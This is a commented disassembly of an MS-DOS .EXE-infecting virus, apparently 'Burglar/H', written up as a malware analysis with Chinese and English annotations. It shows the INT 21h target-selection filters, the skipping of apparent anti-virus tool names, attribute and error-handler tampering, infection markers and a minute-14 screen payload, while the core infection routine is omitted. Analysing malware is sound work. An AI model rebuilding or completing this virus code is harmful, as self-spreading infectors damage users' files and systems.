grave 病毒.txt
9F6A:012F 1F POP DS
9F6A:0130 9C PUSHF
9F6A:0131 B41A MOV AH,1A ;恢復原 DTA 地址
9F6A:0133 CD21 INT 21
9F6A:0135 9D POPF
9F6A:0136 5F POP DI
9F6A:0137 5E POP SI
9F6A:0138 07 POP ES
9F6A:0139 1F POP DS
9F6A:013A 5A POP DX
9F6A:013B 59 POP CX
9F6A:013C 5B POP BX
9F6A:013D 58 POP AX
9F6A:013E 2EC6067E0400 MOV Byte Ptr CS:[047E],00 ;清 DIR 傳染標志
9F6A:0144 2E803E330501 CMP Byte Ptr CS:[0533],01 ;????
9F6A:014A 7502 JNZ 014E
9F6A:014C 33DB XOR BX,BX
9F6A:014E E954FF JMP 00A5
;==================================================================
; Infection-candidate check (entry 0151). Reached from the virus's INT 21h
; hook: AH holds the intercepted DOS function number (compared with 4Bh
; below) and DS:DX points at the ASCIIZ path of the file being accessed.
; Returns without doing anything unless the file passes every filter below.
9F6A:0151 8BF2 MOV SI,DX
9F6A:0153 2E89162505 MOV CS:[0525],DX ;CS:[0525] = pointer to the bare file name; starts as the whole path
9F6A:0158 90 NOP ;loop 0159-016B: walk the path up to its 00 terminator
9F6A:0159 AC LODSB ;and move CS:[0525] past every '\' or ':',
9F6A:015A 0AC0 OR AL,AL ;so it ends up at the first byte after the last separator
9F6A:015C 740F JZ 016D ;00 terminator reached
9F6A:015E 3C5C CMP AL,5C ;'\'
9F6A:0160 7404 JZ 0166
9F6A:0162 3C3A CMP AL,3A ;':'
9F6A:0164 75F3 JNZ 0159
9F6A:0166 2E89362505 MOV CS:[0525],SI ;separator seen: file name starts at the next byte
9F6A:016B EBEC JMP 0159
9F6A:016D 80FC4B CMP AH,4B ;AH = 4Bh (EXEC): skip the extension test, go straight to 0182
9F6A:0170 90 NOP ;
9F6A:0171 740F JZ 0182 ;
9F6A:0173 817CFB2E45 CMP Word Ptr [SI-05],452E ;SI is past the 00: bytes at [SI-5] = 2E 45 = ".E"
9F6A:0178 7507 JNZ 0181
9F6A:017A 817CFD5845 CMP Word Ptr [SI-03],4558 ;bytes at [SI-3] = 58 45 = "XE"; upper case only, ".exe" is not matched
9F6A:017F 7401 JZ 0182 ;name ends in ".EXE": continue with the name filters
9F6A:0181 C3 RET ;anything else is left alone
9F6A:0182 0E PUSH CS ;name filters: ES = CS for SCASW
9F6A:0183 07 POP ES
9F6A:0184 2E8B362505 MOV SI,CS:[0525]
9F6A:0189 BF0E04 MOV DI,040E ;table of 7 words at CS:040E-041B (see the data dump)
9F6A:018C AD LODSW ;AX = first two characters of the file name
9F6A:018D B90700 MOV CX,0007 ;names beginning CL, HW, TB, F-, WC or TK are not
9F6A:0190 F2 REPNZ ;infected (the 7th table entry is 0000); presumably the
9F6A:0191 AF SCASW ;prefixes of anti-virus tools of the period - not confirmed here
9F6A:0192 7417 JZ 01AB ;prefix matched: leave the file alone
9F6A:0194 2E8B362505 MOV SI,CS:[0525] ;second filter: scan the whole name, extension included
9F6A:0199 AC LODSB
9F6A:019A 3C00 CMP AL,00
9F6A:019C 740A JZ 01A8 ;end of name, no V/S found
9F6A:019E 3C56 CMP AL,56 ;any upper-case 'V' (56h) or 'S' (53h) anywhere
9F6A:01A0 7409 JZ 01AB ;in the name means the file is not infected
9F6A:01A2 3C53 CMP AL,53
9F6A:01A4 7405 JZ 01AB
9F6A:01A6 EBF1 JMP 0199
9F6A:01A8 E80100 CALL 01AC ;all filters passed: infect the file (routine at 01AC)
9F6A:01AB C3 RET
;======================================================================
; Infect one executable (entry 01AC). Called from 01A8 with DS:DX = path.
; CALL 00AD is used instead of INT 21 for most DOS services; 00AD is outside
; this listing - presumably it reaches the original INT 21h handler.
; Every failure path ends at 0245, which restores the file attributes.
;======================================================================
9F6A:01AC 8CDB MOV BX,DS ;save DS; point INT 24h (the DOS critical-error
9F6A:01AE 33C0 XOR AX,AX ;handler, vector at 0000:0090) at CS:042B
9F6A:01B0 8ED8 MOV DS,AX
9F6A:01B2 FF369000 PUSH [0090] ;old vector kept on the stack, restored at 0252/0256
9F6A:01B6 FF369200 PUSH [0092]
9F6A:01BA C70690002B04 MOV Word Ptr [0090],042B ;presumably so a failed write never raises a DOS error prompt
9F6A:01C0 8C0E9200 MOV [0092],CS
9F6A:01C4 8EDB MOV DS,BX
9F6A:01C6 B84300 MOV AX,0043 ;AH=43 AL=00: get file attributes -> CX
9F6A:01C9 E8E1FE CALL 00AD
9F6A:01CC 1E PUSH DS ;save path pointer (DS:DX) and the
9F6A:01CD 52 PUSH DX ;original attributes (CX) for 0245
9F6A:01CE 51 PUSH CX
9F6A:01CF 33C9 XOR CX,CX ;AX=4301 with CX=0: clear read-only/hidden/system
9F6A:01D1 B84301 MOV AX,0143 ;so the file can be opened for writing
9F6A:01D4 E8D6FE CALL 00AD
9F6A:01D7 7308 JNB 01E1 ;CF set = DOS error
9F6A:01D9 2EFE063405 INC Byte Ptr CS:[0534] ;failure counter at CS:0534 (how it is consumed is not shown here)
9F6A:01DE EB65 JMP 0245 ;restore attributes and return
9F6A:01E0 90 NOP
9F6A:01E1 B83D02 MOV AX,023D ;AH=3D AL=02: open for read/write
9F6A:01E4 E8C6FE CALL 00AD
9F6A:01E7 7309 JNB 01F2
9F6A:01E9 2EFE063405 INC Byte Ptr CS:[0534] ;same failure path as above
9F6A:01EE EB55 JMP 0245
9F6A:01F0 90 NOP
9F6A:01F1 90 NOP
9F6A:01F2 93 XCHG AX,BX ;BX = file handle
9F6A:01F3 B85700 MOV AX,0057 ;AH=57 AL=00: get file date/time
9F6A:01F6 E8B4FE CALL 00AD
9F6A:01F9 2E890E2905 MOV CS:[0529],CX ;time -> CS:0529 (OR'ed with 1Dh at 0230 after a successful infection)
9F6A:01FE 52 PUSH DX ;date stays on the stack until 0235
9F6A:01FF 90 NOP
9F6A:0200 0E PUSH CS ;DS = ES = CS for the header buffer
9F6A:0201 1F POP DS
9F6A:0202 0E PUSH CS
9F6A:0203 07 POP ES
9F6A:0204 B03F MOV AL,3F ;AH=3F: read the first 66h bytes of the file
9F6A:0206 BA7F04 MOV DX,047F ;into the buffer at CS:047F
9F6A:0209 B96600 MOV CX,0066
9F6A:020C E89EFE CALL 00AD ;the number of bytes actually read (AX) is not checked
9F6A:020F A17F04 MOV AX,[047F] ;first word of the header (little-endian)
9F6A:0212 90 NOP
9F6A:0213 3D5A4D CMP AX,4D5A ;AX=4D5A means file bytes 5A 4D ("ZM"): accepted as EXE, go to 0222
9F6A:0216 90 NOP
9F6A:0217 7409 JZ 0222
9F6A:0219 3D4D5A CMP AX,5A4D ;AX=5A4D means file bytes 4D 5A ("MZ"): the usual EXE signature
9F6A:021C 90 NOP
9F6A:021D 7403 JZ 0222
9F6A:021F EB14 JMP 0235 ;no EXE signature: not infected, go to cleanup
9F6A:0221 90 NOP
;===================================================================
; EXE header buffer at CS:047F: [0491] = header offset 12h (checksum field,
; low byte), [0493] = header offset 14h (initial IP, low byte).
9F6A:0222 A09304 MOV AL,[0493] ;infection-marker check: low byte of the initial IP
9F6A:0225 3478 XOR AL,78 ;XOR 78h
9F6A:0227 38069104 CMP [0491],AL ;equals the low byte of the checksum field only in an infected file
9F6A:022B 7408 JZ 0235 ;marker present: already infected, skip to cleanup
9F6A:022D EB2E JMP 025D ;marker absent: go and infect (025D)
9F6A:022F 90 NOP
;0230 is reached by the JMP at 0351 once infection and the payload are done
9F6A:0230 830E29051D OR Word Ptr [0529],+1D ;second marker: OR 1Dh into the saved file time
;(bits 0-4 of a DOS time are seconds/2, so the stamp shows 58 seconds)
9F6A:0235 5A POP DX ;cleanup: DX = saved date
9F6A:0236 8B0E2905 MOV CX,[0529] ;CX = saved time (with the 1Dh marker if infected)
9F6A:023A B85701 MOV AX,0157 ;AH=57 AL=01: write the date/time back
9F6A:023D E86DFE CALL 00AD
9F6A:0240 B03E MOV AL,3E ;AH=3E: close handle BX
9F6A:0242 E868FE CALL 00AD
9F6A:0245 B84301 MOV AX,0143 ;AH=43 AL=01: restore the original attributes
9F6A:0248 59 POP CX ;CX = attributes, DS:DX = path (pushed at 01CC-01CE)
9F6A:0249 5A POP DX
9F6A:024A 1F POP DS
9F6A:024B E85FFE CALL 00AD
9F6A:024E 33C0 XOR AX,AX ;restore the original INT 24h vector
9F6A:0250 8ED8 MOV DS,AX
9F6A:0252 8F069200 POP [0092]
9F6A:0256 8F069000 POP [0090]
9F6A:025A 0E PUSH CS ;DS = CS
9F6A:025B 1F POP DS
9F6A:025C C3 RET
;======================================================================
;開始傳染 .EXE 文件
9F6A:025D BE7F04 MOV SI,047F ;SI 指向文件頭
9F6A:0260 90 NOP
9F6A:0261 C70627050000 MOV Word Ptr [0527],0000
9F6A:0267 8B543C MOV DX,[SI+3C] ;取 NE 文件頭偏移
9F6A:026A 8B4C3E MOV CX,[SI+3E]
9F6A:026D B80042 MOV AX,4200
9F6A:0270 CD21 INT 21
9F6A:0272 B90200 MOV CX,0002 ;讀出 NE 文件頭 2 字節
9F6A:0275 BA2705 MOV DX,0527
9F6A:0278 B43F MOV AH,3F
9F6A:027A CD21 INT 21
9F6A:027C 813E27054E45 CMP Word Ptr [0527],454E
9F6A:0282 7502 JNZ 0286 ;是 "NE" 新格式文件
9F6A:0284 EBAF JMP 0235 ;不傳染
9F6A:0286 B002 MOV AL,02 ;4202 功能
9F6A:0288 E8C900 CALL 0354 ;取文件長度
9F6A:028B 83FA06 CMP DX,+06 ;> 393216 字節不傳染
9F6A:028E 77A5 JA 0235
9F6A:0290 0BD2 OR DX,DX
9F6A:0292 7507 JNZ 029B
9F6A:0294 3D0001 CMP AX,0100 ;< 256 字節不傳染
9F6A:0297 7702 JA 029B
9F6A:0299 EB9A JMP 0235
9F6A:029B 52 PUSH DX
9F6A:029C 50 PUSH AX
9F6A:029D 8B4404 MOV AX,[SI+04]
9F6A:02A0 8B7C02 MOV DI,[SI+02]
9F6A:02A3 0BFF OR DI,DI
9F6A:02A5 7401 JZ 02A8
9F6A:02A7 48 DEC AX
9F6A:02A8 B90002 MOV CX,0200
9F6A:02AB F7E1 MUL CX
9F6A:02AD 03C7 ADD AX,DI
9F6A:02AF 83D200 ADC DX,+00
9F6A:02B2 5F POP DI
9F6A:02B3 3BF8 CMP DI,AX ;如果文件有覆蓋部分
9F6A:02B5 5F POP DI ;不傳染
9F6A:02B6 75E1 JNZ 0299
9F6A:02B8 3BFA CMP DI,DX
9F6A:02BA 75DD JNZ 0299
...
;以下病毒具體傳染文件的代碼不是本文討論的對象,故略去
...
;After infection the virus runs its payload; 0329 follows the code elided above.
;The author calls the payload benign; what is visible here only writes to the screen.
9F6A:0329 B42C MOV AH,2C ;AH=2C: get system time (CH hour, CL minute, DH second)
9F6A:032B CD21 INT 21
9F6A:032D 80F90E CMP CL,0E ;trigger only when the minute is 14
9F6A:0330 751F JNZ 0351
9F6A:0332 BE1E04 MOV SI,041E ;CS:041E = "Burglar/H" (9 bytes, see the data dump)
9F6A:0335 B800B8 MOV AX,B800 ;DS = B800h, colour text-mode video memory
9F6A:0338 8ED8 MOV DS,AX
9F6A:033A 33FF XOR DI,DI ;DI = 0: top-left cell of the screen
9F6A:033C B90900 MOV CX,0009 ;9 characters
9F6A:033F 2E8A04 MOV AL,CS:[SI]
9F6A:0342 46 INC SI
9F6A:0343 8805 MOV [DI],AL ;character byte
9F6A:0345 47 INC DI ;attribute byte 8Fh = blinking bright white on black
9F6A:0346 C6058F MOV Byte Ptr [DI],8F
9F6A:0349 47 INC DI
9F6A:034A E2F3 LOOP 033F
9F6A:034C B97777 MOV CX,7777 ;busy-wait delay
9F6A:034F E2FE LOOP 034F
9F6A:0351 E9DCFE JMP 0230 ;back into the infect routine: set the time marker, close, restore
;===================================================================
; Seek helper (entry 0354). Caller sets AL (seek origin; 02 = from end of
; file) and BX (handle, set at 01F2). Seeks by offset 0 from that origin, so
; with AL=02 DX:AX comes back as the file length (used that way at 0286/0288).
9F6A:0354 33C9 XOR CX,CX ;CX:DX = offset 0
9F6A:0356 33D2 XOR DX,DX
9F6A:0358 B442 MOV AH,42 ;AH=42: LSEEK
9F6A:035A CD21 INT 21 ;direct INT 21 here, unlike the CALL 00AD used elsewhere
9F6A:035C C3 RET
9F6A:0402 90 BC 06 81 01 9C-88 01 01 01 01 E7 43 4C .<.........gCL
9F6A:0410 48 57 54 42 46 2D 57 43-54 4B 00 00 00 00 42 75 HWTBF-WCTK....Bu
9F6A:0420 72 67 6C 61 72 2F 48 2A-2E 2A 00 32 C0 CF 00 00 rglar/H*.*.2@O..
9F6A:0430 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
9F6A:0440 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
9F6A:0450 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
9F6A:0460 00 00 00 00 78 F0 00 00-19 04 0C 00 00 00 BC 15 ....xp........<.
9F6A:0470 BC 15 06 70 A3 10 78 03-8A 17 65 0F 05 00 00
9F6A:047F 4D <..p#.x...e....M
9F6A:0480 5A C4 01 28 00 00 00 02-00 3D 0B FF FF B2 04 84 ZD.(.....=...2..
9F6A:0490 04 7E 89 06 00 B2 04 1C-00 00 00 64 69 65 74 F9 .~...2.....diety
9F6A:04A0 9C EB 09 69 42 0A 00 A8-B8 55 F8 9C 06 1E 57 56 .k.iB..(8Ux...WV
9F6A:04B0 52 51 53 50 0E FC 8C C8-BA 52 07 03 D0 52 BA 79 RQSP.|.H:R..PR:y
9F6A:04C0 06 52 BA BC 04 03 C2 8B-D8 05 0E 03 8E DB 8E C0 .R:<..B.X....[.@
9F6A:04D0 33 F6 33 FF B9 08 00 F3-A5 4B 48 4A 79 EE 8E C3 3v3.9..s%KHJyn.C
9F6A:04E0 8E D8 BE 67 00 .X>g.
9F6A:04E5 01 3F 3F-3F 3F 3F 3F 3F 3F 3F 3F .??????????
9F6A:04F0 3F 27 0D 00 00 00 12 E0-1E 00 20 FA 99 27 21 67 ?'.....`.. z.'!g
9F6A:0500 59 00 00 56 49 52 2E 4C-53 54 00 45 00 00 00 00 Y..VIR.LST.E....
9F6A:0510 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
9F6A:0520 00 00 00 00 00 38 05 00-00 7D 97 00 00 00 00 80 .....8...}......
9F6A:0530 00 6F 18 00 03 00 00 00-00 00 00 00 00 00 00 00 .o..............
9F6A:0540 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................